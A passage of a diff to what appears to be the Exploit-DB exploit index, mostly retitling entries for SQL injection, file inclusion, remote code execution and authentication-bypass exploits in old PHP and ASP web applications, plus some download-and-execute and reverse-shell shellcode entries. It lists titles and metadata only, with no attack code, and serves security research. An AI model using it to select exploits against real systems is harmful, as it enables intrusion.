Security Team",lin_x86-64,shellcode,0 40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download & Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 +40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -15976,7 +15986,7 @@ id,file,description,date,author,platform,type,port 1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution",2006-02-16,cijfer,php,webapps,0 1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution",2006-02-17,RusH,cgi,webapps,0 1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - 'rollid' SQL Injection",2006-02-17,RusH,php,webapps,0 -1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - (csscontent) Remote Code Execution",2006-02-17,RusH,php,webapps,0 +1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - 'csscontent' Parameter Remote Code Execution",2006-02-17,RusH,php,webapps,0 1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0 1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,php,webapps,0 1513,platforms/php/webapps/1513.php,"BXCP 0.2.9.9 - (tid) SQL Injection",2006-02-19,x128,php,webapps,0 @@ -16295,7 +16305,7 @@ id,file,description,date,author,platform,type,port 2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - (m2f_root_path) Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0 2020,platforms/php/webapps/2020.txt,"Mambo Component com_videodb 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0 2021,platforms/php/webapps/2021.txt,"Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion",2006-07-17,ASIANEAGLE,php,webapps,0 -2022,platforms/php/webapps/2022.txt,"Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0 +2022,platforms/php/webapps/2022.txt,"Mambo Component ExtCalendar 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0 2023,platforms/php/webapps/2023.txt,"Mambo Component com_loudmouth 4.0j - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0 2024,platforms/php/webapps/2024.txt,"Mambo Component pc_cookbook 0.3 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 2025,platforms/php/webapps/2025.txt,"Mambo Component perForms 1.0 - Remote File Inclusion",2006-07-17,endeneu,php,webapps,0 @@ -16434,7 +16444,7 @@ id,file,description,date,author,platform,type,port 2221,platforms/php/webapps/2221.txt,"Fantastic News 2.1.3 - (script_path) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 2222,platforms/php/webapps/2222.txt,"Mambo Component com_lurm_constructor 0.6b - Remote File Inclusion",2006-08-19,mdx,php,webapps,0 2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - 'adminlog' Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 -2225,platforms/php/webapps/2225.txt,"Mambo Component com_babackup 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0 +2225,platforms/php/webapps/2225.txt,"Mambo Component bigAPE-Backup 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0 2226,platforms/php/webapps/2226.txt,"NES Game and NES System c108122 - File Inclusion",2006-08-20,Kacper,php,webapps,0 2227,platforms/php/webapps/2227.txt,"SportsPHool 1.0 - (mainnav) Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps,0 @@ -17071,7 +17081,7 @@ id,file,description,date,author,platform,type,port 3066,platforms/asp/webapps/3066.txt,"NewsCMSLite - 'newsCMS.mdb' Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0 3068,platforms/asp/webapps/3068.htm,"TaskTracker 1.5 - (Customize.asp) Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0 -3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' SQL Injection",2007-01-03,ajann,asp,webapps,0 +3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' Parameter SQL Injection",2007-01-03,ajann,asp,webapps,0 3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - (language.php) Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps,0 3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0 3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - (inc/init.inc.php) Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 @@ -17354,7 +17364,7 @@ id,file,description,date,author,platform,type,port 3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - (default.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure Remote",2007-03-23,GoLd_M,php,webapps,0 3556,platforms/asp/webapps/3556.htm,"Active NewsLetter 4.3 - (ViewNewspapers.asp) SQL Injection",2007-03-23,ajann,asp,webapps,0 -3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component 'com_swmenupro' 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 +3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 3558,platforms/asp/webapps/3558.htm,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 3560,platforms/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS - (index.php cms) Remote File Inclusion",2007-03-24,Sharingan,php,webapps,0 @@ -17445,7 +17455,7 @@ id,file,description,date,author,platform,type,port 3700,platforms/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps,0 3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0 3702,platforms/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution",2007-04-10,BlackHawk,php,webapps,0 -3703,platforms/php/webapps/3703.txt,"Joomla! / Mambo Component 'com_thopper' 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0 +3703,platforms/php/webapps/3703.txt,"Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0 3704,platforms/php/webapps/3704.txt,"pl-PHP Beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0 3705,platforms/php/webapps/3705.txt,"SimpCMS 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0 3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,php,webapps,0 @@ -17469,7 +17479,7 @@ id,file,description,date,author,platform,type,port 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Inclusion",2007-04-14,irvian,php,webapps,0 3734,platforms/php/webapps/3734.txt,"Joomla! Component module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0 -3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component 'com_articles' 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 +3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component New Article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3739,platforms/php/webapps/3739.php,"Papoo 3.02 - (kontakt menuid) SQL Injection",2007-04-15,Kacper,php,webapps,0 3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - (who_r.php bj) Remote File Inclusion",2007-04-15,irvian,php,webapps,0 3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - (footer.php template) Local File Inclusion",2007-04-15,BeyazKurt,php,webapps,0 @@ -17775,7 +17785,7 @@ id,file,description,date,author,platform,type,port 4256,platforms/php/webapps/4256.pl,"Envolution 1.1.0 - (topic) SQL Injection",2007-08-05,k1tk4t,php,webapps,0 4258,platforms/php/webapps/4258.txt,"Lanius CMS 1.2.14 - Multiple SQL Injections",2007-08-06,k1tk4t,php,webapps,0 4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - (showpage.cgi p) Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 -4264,platforms/cgi/webapps/4264.txt,"Cartweaver - 'Details.cfm ProdID' SQL Injection",2007-08-06,meoconx,cgi,webapps,0 +4264,platforms/cgi/webapps/4264.txt,"Cartweaver 2.16.11 - 'ProdID' Parameter SQL Injection",2007-08-06,meoconx,cgi,webapps,0 4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0 4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - 'format_menue' Parameter Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 @@ -18051,7 +18061,7 @@ id,file,description,date,author,platform,type,port 4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0 4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 -4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component 'com_rsgallery' 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0 +4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' Parameter SQL Injection",2007-12-05,K-159,php,webapps,0 4693,platforms/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 4694,platforms/php/webapps/4694.txt,"EZContents 1.4.5 - (index.php link) Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 4695,platforms/php/webapps/4695.txt,"WordPress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0 @@ -18091,7 +18101,7 @@ id,file,description,date,author,platform,type,port 4750,platforms/php/webapps/4750.txt,"PHPMyRealty 1.0.x - (search.php type) SQL Injection",2007-12-18,Koller,php,webapps,0 4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 - Arbitrary File Upload",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 -4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - (view.php list) Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0 +4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - 'view.php' Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0 4762,platforms/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,php,webapps,0 4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - (output) Remote File Inclusion",2007-12-21,CraCkEr,php,webapps,0 4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 - (loadadminpage) Remote File Inclusion",2007-12-21,KnocKout,php,webapps,0 @@ -18372,7 +18382,7 @@ id,file,description,date,author,platform,type,port 5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,php,webapps,0 5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - 'url' Parameter Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0 5138,platforms/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0 -5139,platforms/php/webapps/5139.txt,"Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0 +5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio Manager 1.0 - 'categoryId' Parameter SQL Injection",2008-02-18,"it's my",php,webapps,0 5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Parameter Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 5145,platforms/php/webapps/5145.txt,"Joomla! Component com_pccookbook - 'user_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 5146,platforms/php/webapps/5146.txt,"Joomla! Component com_clasifier - 'cat_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 @@ -18465,7 +18475,7 @@ id,file,description,date,author,platform,type,port 5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary 0.94 - SQL Injection",2008-03-17,S@BUN,php,webapps,0 5273,platforms/php/webapps/5273.txt,"Joomla! Component Acajoom 1.1.5 - SQL Injection",2008-03-18,fataku,php,webapps,0 5274,platforms/asp/webapps/5274.txt,"KAPhotoservice - 'album.asp' SQL Injection",2008-03-18,JosS,asp,webapps,0 -5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' SQL Injection",2008-03-18,n3w7u,php,webapps,0 +5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' Parameter SQL Injection",2008-03-18,n3w7u,php,webapps,0 5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'CatId' Parameter SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 5277,platforms/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 5278,platforms/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 @@ -18875,35 +18885,35 @@ id,file,description,date,author,platform,type,port 5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add Admin",2008-06-11,"CWH Underground",php,webapps,0 5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Blind SQL Injection",2008-06-11,"CWH Underground",php,webapps,0 5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,php,webapps,0 -5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Blind SQL Injection",2008-06-11,anonymous,php,webapps,0 -5791,platforms/php/webapps/5791.txt,"Gravity Board X 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 +5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Parameter Blind SQL Injection",2008-06-11,anonymous,php,webapps,0 +5791,platforms/php/webapps/5791.txt,"Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting",2008-06-12,"CWH Underground",php,webapps,0 5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusion",2008-06-12,"CWH Underground",php,webapps,0 5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - 'results.php' SQL Injection",2008-06-12,anonymous,php,webapps,0 -5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection",2008-06-12,TheDefaced,php,webapps,0 -5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0 +5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - 'detail' Parameter SQL Injection",2008-06-12,TheDefaced,php,webapps,0 +5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting",2008-06-13,"CWH Underground",php,webapps,0 5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin",2008-06-13,"CWH Underground",php,webapps,0 -5799,platforms/php/webapps/5799.pl,"Mambo Component 'com_galleries' 1.0 - 'aid' Parameter SQL Injection",2008-06-13,Houssamix,php,webapps,0 +5799,platforms/php/webapps/5799.pl,"Mambo Component Galleries 1.0 - 'aid' Parameter SQL Injection",2008-06-13,Houssamix,php,webapps,0 5800,platforms/php/webapps/5800.pl,"Butterfly ORGanizer 2.0.0 - Arbitrary Delete (Category/Account)",2008-06-13,Stack,php,webapps,0 -5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - (section) Local File Inclusion",2008-06-13,Loader007,php,webapps,0 -5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - (tsk_id) SQL Injection",2008-06-13,"Virangar Security",php,webapps,0 -5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - (index.php id) SQL Injection",2008-06-13,K-159,php,webapps,0 -5804,platforms/php/webapps/5804.txt,"Pre Ads Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0 +5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - 'section' Parameter Local File Inclusion",2008-06-13,Loader007,php,webapps,0 +5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - 'tsk_id' Parameter SQL Injection",2008-06-13,"Virangar Security",php,webapps,0 +5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - 'id' Parameter SQL Injection",2008-06-13,K-159,php,webapps,0 +5804,platforms/php/webapps/5804.txt,"Pre ADS Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0 5805,platforms/asp/webapps/5805.txt,"E-Smart Cart - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0 -5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'listing.php sort' Blind SQL Injection",2008-06-13,anonymous,php,webapps,0 +5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'sort' Parameter Blind SQL Injection",2008-06-13,anonymous,php,webapps,0 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,php,webapps,0 5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - 'Output.php' Remote File Inclusion",2008-06-13,irk4z,php,webapps,0 5809,platforms/php/webapps/5809.txt,"Pre Job Board - 'JobSearch.php' SQL Injection",2008-06-14,JosS,php,webapps,0 -5810,platforms/php/webapps/5810.txt,"Contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 +5810,platforms/php/webapps/5810.txt,"Contenido 4.8.4 - Remote File Inclusion / Cross-Site Scripting",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",php,webapps,0 -5812,platforms/php/webapps/5812.txt,"PHPMyCart - 'shop.php cat' SQL Injection",2008-06-14,anonymous,php,webapps,0 -5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 -5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - (prodId) Blind SQL Injection",2008-06-14,anonymous,php,webapps,0 -5816,platforms/php/webapps/5816.pl,"DIY - (index_topic did) Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0 +5812,platforms/php/webapps/5812.txt,"PHPMyCart 1.3 - 'cat' Parameter SQL Injection",2008-06-14,anonymous,php,webapps,0 +5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - 'page' Parameter Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 +5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - 'prodId' Parameter Blind SQL Injection",2008-06-14,anonymous,php,webapps,0 +5816,platforms/php/webapps/5816.pl,"DIY - 'did' Parameter Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0 5818,platforms/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 - Insecure Cookie Handling",2008-06-14,t0pP8uZz,php,webapps,0 -5819,platforms/php/webapps/5819.txt,"ezcms 1.2 - (Blind SQL Injection / Authentication Bypass) Multiple Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0 -5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - (POST) SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0 +5819,platforms/php/webapps/5819.txt,"ezcms 1.2 - Blind SQL Injection / Authentication Bypass",2008-06-14,t0pP8uZz,php,webapps,0 +5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - 'POST' Parameter SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0 5821,platforms/php/webapps/5821.txt,"Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections",2008-06-14,t0pP8uZz,php,webapps,0 -5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a - (currentfile) Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0 +5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a - 'currentfile' Parameter Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0 5823,platforms/php/webapps/5823.txt,"AWBS 2.7.1 - (news.php viewnews) SQL Injection",2008-06-15,Mr.SQL,php,webapps,0 5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 - (change.php) Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps,0 5826,platforms/php/webapps/5826.py,"Simple Machines Forum (SMF) 1.1.4 - SQL Injection",2008-06-15,The:Paradox,php,webapps,0 @@ -18950,7 +18960,7 @@ id,file,description,date,author,platform,type,port 5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 5873,platforms/php/webapps/5873.txt,"Lightweight news portal [lnp] 1.0b - Multiple Vulnerabilities",2008-06-20,storm,php,webapps,0 -5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - (index.php act) Local File Inclusion",2008-06-20,storm,php,webapps,0 +5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - 'act' Parameter Local File Inclusion",2008-06-20,storm,php,webapps,0 5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 - (links-extern.php id) SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 5876,platforms/php/webapps/5876.txt,"Jamroom 3.3.5 - Remote File Inclusion",2008-06-20,cyberlog,php,webapps,0 5877,platforms/php/webapps/5877.txt,"jaxultrabb 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-20,"CWH Underground",php,webapps,0 @@ -19008,7 +19018,7 @@ id,file,description,date,author,platform,type,port 5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - (index.php hal) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 - (index.php zone) Local File Inclusion",2008-06-25,StAkeR,php,webapps,0 5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script - (sb_jokeid) SQL Injection",2008-06-25,"Hussin X",php,webapps,0 -5935,platforms/php/webapps/5935.pl,"Mambo Component 'articles' - 'artid' Parameter Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0 +5935,platforms/php/webapps/5935.pl,"Mambo Component Articles - 'artid' Parameter Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0 5936,platforms/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Arbitrary File Upload",2008-06-25,"CWH Underground",php,webapps,0 5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 5938,platforms/php/webapps/5938.php,"PHPmotion 2.0 - (update_profile.php) Arbitrary File Upload",2008-06-25,EgiX,php,webapps,0 @@ -19047,7 +19057,7 @@ id,file,description,date,author,platform,type,port 5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0 5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0 5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps,0 -5980,platforms/php/webapps/5980.txt,"Mambo Component 'com_n-gallery' - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0 +5980,platforms/php/webapps/5980.txt,"Mambo Component N-Gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0 5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0 5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 @@ -19316,7 +19326,7 @@ id,file,description,date,author,platform,type,port 6363,platforms/php/webapps/6363.txt,"qwicsite pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0 6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0 -6369,platforms/php/webapps/6369.py,"devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0 +6369,platforms/php/webapps/6369.py,"Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0 6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'index.php id' Blind SQL Injection",2008-09-05,JosS,php,webapps,0 6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - (news_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 @@ -19813,7 +19823,7 @@ id,file,description,date,author,platform,type,port 7002,platforms/php/webapps/7002.txt,"Joomla! Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0 7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'moreinfo.php pg' SQL Injection",2008-11-05,G4N0K,php,webapps,0 7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - SQL Injection (Authentication Bypass)",2008-11-05,"Hussin X",php,webapps,0 -7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 +7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0 7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - (recid) SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0 7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps,0 @@ -19824,7 +19834,7 @@ id,file,description,date,author,platform,type,port 7014,platforms/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - (Authentication Bypass) SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 7016,platforms/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 -7017,platforms/php/webapps/7017.txt,"Pre ADS Portal 2.0 - (Authentication Bypass / Cross-Site Scripting) Multiple 